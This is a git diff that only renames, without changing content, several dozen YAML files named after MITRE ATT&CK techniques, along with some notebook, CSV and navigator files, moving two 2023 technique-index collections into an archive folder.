diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
diff --git a/fs-index-2023/techniques/Execution/T1106_exe_v1.yml b/archived/2023/fs-index-2023/techniques/Execution/T1106_exe_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Execution/T1106_exe_v1.yml
rename to archived/2023/fs-index-2023/techniques/Execution/T1106_exe_v1.yml
diff --git a/fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml b/archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
rename to archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
diff --git a/fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml b/archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml
rename to archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml
diff --git a/fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml b/archived/2023/fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml
rename to archived/2023/fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml
diff --git a/fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml b/archived/2023/fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
rename to archived/2023/fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
diff --git a/fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml b/archived/2023/fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
rename to archived/2023/fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
diff --git a/fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml b/archived/2023/fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml
rename to archived/2023/fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml
diff --git a/fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
diff --git a/fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
diff --git a/fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
diff --git a/fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml
diff --git a/h-index-2023/NOTEBOOK.md b/archived/2023/h-index-2023/NOTEBOOK.md
similarity index 100%
rename from h-index-2023/NOTEBOOK.md
rename to archived/2023/h-index-2023/NOTEBOOK.md
diff --git a/h-index-2023/REQUIREMENTS.md b/archived/2023/h-index-2023/REQUIREMENTS.md
similarity index 100%
rename from h-index-2023/REQUIREMENTS.md
rename to archived/2023/h-index-2023/REQUIREMENTS.md
diff --git a/h-index-2023/h-index-2023-v1.2-summary.csv b/archived/2023/h-index-2023/h-index-2023-v1.2-summary.csv
similarity index 100%
rename from h-index-2023/h-index-2023-v1.2-summary.csv
rename to archived/2023/h-index-2023/h-index-2023-v1.2-summary.csv
diff --git a/h-index-2023/h-index-2023-v1.2.yml b/archived/2023/h-index-2023/h-index-2023-v1.2.yml
similarity index 100%
rename from h-index-2023/h-index-2023-v1.2.yml
rename to archived/2023/h-index-2023/h-index-2023-v1.2.yml
diff --git a/h-index-2023/navigator.json b/archived/2023/h-index-2023/navigator.json
similarity index 100%
rename from h-index-2023/navigator.json
rename to archived/2023/h-index-2023/navigator.json
diff --git a/h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml b/archived/2023/h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml
rename to archived/2023/h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml
diff --git a/h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml b/archived/2023/h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
rename to archived/2023/h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
diff --git a/h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml b/archived/2023/h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml
diff --git a/h-index-2023/techniques/Execution/T1106_exe_v1.yml b/archived/2023/h-index-2023/techniques/Execution/T1106_exe_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Execution/T1106_exe_v1.yml
rename to archived/2023/h-index-2023/techniques/Execution/T1106_exe_v1.yml
diff --git a/h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml b/archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
rename to archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
diff --git a/h-index-2023/techniques/Execution/T1204.002_macro_v1.yml b/archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Execution/T1204.002_macro_v1.yml
rename to archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_v1.yml
diff --git a/h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml b/archived/2023/h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml
rename to archived/2023/h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml
diff --git a/h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml b/archived/2023/h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
rename to archived/2023/h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
diff --git a/h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml b/archived/2023/h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
rename to archived/2023/h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
diff --git a/h-index-2023/techniques/Impact/T1486_ransomware_v3.yml b/archived/2023/h-index-2023/techniques/Impact/T1486_ransomware_v3.yml
similarity index 100%
rename from h-index-2023/techniques/Impact/T1486_ransomware_v3.yml
rename to archived/2023/h-index-2023/techniques/Impact/T1486_ransomware_v3.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
diff --git a/h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml b/archived/2023/h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
similarity index 100%
rename from h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
rename to archived/2023/h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
